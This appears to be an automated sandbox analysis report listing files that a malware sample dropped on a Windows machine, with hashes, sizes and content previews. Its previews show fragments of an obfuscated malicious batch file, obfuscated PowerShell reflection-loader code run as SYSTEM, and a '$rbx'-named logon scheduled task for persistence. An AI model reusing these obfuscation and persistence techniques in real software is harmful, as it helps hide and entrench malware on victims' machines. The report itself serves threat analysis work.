SHA-256:	0D43921C498F8D4B8CA31B911CE2D310D091BB05EBA6CDD9F53F15BA87D5EAF1
SHA-512:	2F00FB481E7AC1A429FBC9D2BBAEE6249B60288D9DB23A431E44925BCA32B0676A48E23D312899177571CA51FA1877D1CC46FBE008C604E8BD6F615485FF0FD6
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kp2q3ph.fnd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cbg0plj.2iz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1jt3rpj.xty.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4rvt4yh.cwz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgm21jyh.gw0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhngrita.jzm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-04

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	352
Entropy (8bit):	7.388918765068661
Encrypted:	false
SSDEEP:	6:UQ1jTxZnTish4S4a6R1t+BYvT625cFHStOFAcksNo/kLhk70XK8RnJFcZdJZbZGI:v1jtZTr6Xt+WT6YcFHStnHc9C7VCJFcP
MD5:	88171FAF282AB85DB0645B2196A0D5CE
SHA1:	FF96EE7FFEFB060FF6092C062AD44C2D452F12A2
SHA-256:	8D985206D491BDB852B2C8D2B0DB1AC30C31BF6256CDDDBA9EBE11211A4F800D
SHA-512:	267F683CB36BFF408B89D3A177959D716CF44019B3DC0B8251D15FEEF5FB7315520C16032E39B407D6237DFFD510BDFA2CC7C095B66D9678F1C6872BFBF89239
Malicious:	false
Preview:	,..%-........3e.....N.V.....m....&tz.9c&...9..._..I.LV.L7.\...G..WZ.qB....d...c`]...._....s....2.3.O..dGs./.CS..y..O..'.....S.....#.b.......t..b..d.<Czm..6G....:....E...P...u.h......].P.fd'...o..+.......~;D...0.....fC.-.eG...{....U..3N.....Gsk..QD.rE@..'.N2V.....W..}.D...g.#.dY.8...4..w?ia.. DA+7......#.H.-...zw.1 .4e.......-...)...

C:\Users\user\Documents\20241003\PowerShell_transcript.745481.9_jseo4K.20241003232422.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (2692), with CRLF line terminators
Category:	dropped
Size (bytes):	5125
Entropy (8bit):	5.64034777380097
Encrypted:	false
SSDEEP:	96:BZYsZNTvyqo1ZhZ95sZNTvyqo1ZGpovTueovTumVt7vBpB6a5xY595f8bus3wMV4:lEU53b5xY595f7s3wM5IiIIit
MD5:	D3249B029D68739C280AE2A67F07BFB3
SHA1:	D7E0126CAEAC0F311002B2CFE3AF40EE258208D1
SHA-256:	A9D69D88BCA7CABCD9A417D36CFA9C0035ED360152307D2F4E6FCCCF99C373E0
SHA-512:	E853B9B827C4D2E58613B8E66B60A60F1C4C86F185A02CD420FC71D619F4E3DC1ED2555FA68DEF785247E4B2DD3E47B414D23EF2C9EA828BDD87D539142006F4
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20241003232422..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 8184..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20241003232452..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 8184..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

C:\Users\user\Documents\20241003\PowerShell_transcript.745481.JpX1L2Xe.20241003232401.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4553
Entropy (8bit):	5.350799253889995
Encrypted:	false
SSDEEP:	96:BZLsZNTnyqo1ZhZ8sZNTnyqo1ZBpovTueovTu5ZzsZNTnyqo1ZdpovTueovTu3Za:mE/E6
MD5:	34DC8A683D592091ADD1AD20897A97F5
SHA1:	9100DFCD858F5C6681A2A660607C349E9C2CD927
SHA-256:	3F2AC468A0289A6AED5497E64FBD731E27DEC9754A47F17BD33A928D56800542
SHA-512:	3CCD886F038002ECBEA2F40A9F42FC0B89314495FB7C12F30F65342646E46A4FCE61DDE5F2D198F36912883CABE615F52E81B4B7FB9088386960626CF5235C85
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20241003232401..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 7804..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20241003232431..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 7804..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

C:\Users\user\Documents\20241003\PowerShell_transcript.745481.iTQNpVds.20241003232325.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (2684), with CRLF line terminators
Category:	dropped
Size (bytes):	5117
Entropy (8bit):	5.638799120486671
Encrypted:	false
SSDEEP:	96:BZEsZNT2yqo1ZhZGsZNT2yqo1ZHpovTueovTu6MVt7vBpB6a5xY595f8bus3wMcM:DEEo53b5xY595f7s3wMcjIiIIit
MD5:	C881F415078AD1A4FDB7DC1D9001A3B7
SHA1:	4FBDA78F3CF548E438CFB0845896A08F91FA0D24
SHA-256:	590E9FF79EDBFAFC3505E591FC9EEC3E609924F603617A8A3ACD0835DB55475D
SHA-512:	8A5A5F8C479BFB7E2F170BE3F2101F2AAD7032A061A6EF2EC604FF98B8BF560E089E5F8F173940B8C107AADD83774EE6308BAED8135753DF6FA3CCECB0489C0C
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20241003232325..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 3852..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20241003232433..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 3852..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
Category:	dropped
Size (bytes):	5214429
Entropy (8bit):	6.008710946572079
Encrypted:	false
SSDEEP:	49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
MD5:	19FC666F7494D78A55D6B50A0252C214
SHA1:	8876CD520507CBFDC2E89E449BABA52232A1DF1B
SHA-256:	E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
SHA-512:	94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
Malicious:	true
Preview:	@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt

C:\Windows\$rbx-onimai2\$rbx-CO2.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\20241003\PowerShell_transcript.745481.0eedoBAF.20241003232435.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (5587), with CRLF line terminators
Category:	dropped
Size (bytes):	11938
Entropy (8bit):	5.338859047854904
Encrypted:	false
SSDEEP:	96:BZVNZNzR2rvYPtqVU1gqfG32qy+0lKdf0lr0lze2xBGyqo1Z+R2rvYPtqVU1gqf6:fMvbKffvwdcCYMvbKffvwdcCR
MD5:	BD5CB9799A3C589A790C56C0A093AA56
SHA1:	A73FEFF2760826F0B01BC6CB4F5EF90A08B31C29
SHA-256:	2805E28ABBFD552E90CAA986CEFD1CE2A64E85C59ED49F4480B9354CD387144F
SHA-512:	03B4CE85BE5423FC95A27AC0917541DD178B85EB87CA34A70F6101CF83360E7C0F0457D28C550FEDDDC9D73FBF89B98945E5D48774BE37035873D8288C075068
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20241003232435..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[

C:\Windows\System32\Tasks\$rbx-U7ejKPED

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3488
Entropy (8bit):	3.5876857970682092
Encrypted:	false
SSDEEP:	48:yei1q97iaQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCn:tmtnkp2Gdi3ipVA9ll7EhAMz3cHtr+
MD5:	E16738B2749126FE293FD617D2E3BB1C
SHA1:	C1083174C585C25590CC1C25674DFF1D4B5B3717
SHA-256:	E30DBB7DCC6EFD08B03A24DBC81926E88B7A34AFACD700EB17EF6C862495C87A
SHA-512:	000FA8A25DF8D5E78FE775375EDF2F772CD63E57BBAB625EA4F23AB27EE10310C0285BC823C85AF892B623249B69EEB10F4A3F5BBB410381BD0D81B68F7D2CA6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.2.3.:.4.4.:.3.2...4.0.1.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.U.7.e.j.K.P.E.D.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulR//z:NllU5/
MD5:	60B5B1173A68856012544C46D30BB4FD
SHA1:	EA3F6D82BC4E99F9065BE159154CE204139CD874
SHA-256:	E4586F5412A5276CDCA9A9AA613767C3B2F268E4D375A74A77F1BD873AAEC37E
SHA-512:	21C9B49F4096B0EA83F1439B81CE07CC92918A66C79F1F488D5E09F2599CC6C93C11AAD99B1ACEB31A40AA5383CB50425E15A435EBFCF1BA9C343844306B1A85
Malicious:	false
Preview:	@...e.................................H..............@..........

C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	950
Entropy (8bit):	2.8937402169492104
Encrypted:	false
SSDEEP:	12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
MD5:	9D007E669CE25371EE9401DC2AC21D2A
SHA1:	6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
SHA-256:	632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
SHA-512:	AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	78392
Entropy (8bit):	4.0746330380022
Encrypted:	false
SSDEEP:	768:MkJWPW8W3vOUZucxvbNp8CCgOcl4bfAjQwEPnPK0xvkkJWPW8WBGnif:BvkctNp8TcUfAjs7Rcnif
MD5:	256E5B17A98EBD49326588C1FECF1114
SHA1:	8D7B4FA47F02C1BA6787E66F042AEF4E56FE847F
SHA-256:	B7D36E71568433A16AE8B0E1DDF90E324848653CE1521DC4E404DD5A97B4819A
SHA-512:	08C2AE9E8FE1A343C6A6D41405CC52D5389CED3D387F76890D02564445F6CE18BB7B883BBA2FBCBE5E4496C00CC0B06351657C475C2E50A74DB52DDCCF8F15F6
Malicious:	false
Preview:	ElfChnk.................r.......w...............@...........................................................................=..............$...............................=...................................................................................K.......$...............................m...............F...........................t...................M...c...........................n.......................................................................................&...............................*......v........................g&.....................................................................................!...d.............................v..............w.)Cn...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.d.9.b.b.3.1.d.4.3...1.f.f.8...0.1.d.b.1.6.0.c.e.7.f.e.9.3.b.6...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.255530945909032
Encrypted:	false
SSDEEP:	384:dhe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842l4a:dVUHiapX7xadptrDT9W84i
MD5:	790403BFBBF07E1E1ACC47091D970A49
SHA1:	125085F83F8AB841451008DC8EDC9DED4069543F
SHA-256:	EE9CA8D45A7084423BCFD4167098FD2997DAD96DE3821BB93CB8E3205E652321
SHA-512:	B2F1AF2854BD9BEA7DF8E0968440E26B655C0098BC6F90902B1BF13193313B43E073546B9781CED0C5E2F9BDFCB18263E16F3C4E44BFB25CA3847F87FCEB23FF
Malicious:	false
Preview:	ElfChnk.........4...............4...........h................................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.010692427789071
Encrypted:	false
SSDEEP:	384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
MD5:	26C4C5213F3C6B727417EF07207AC1E0
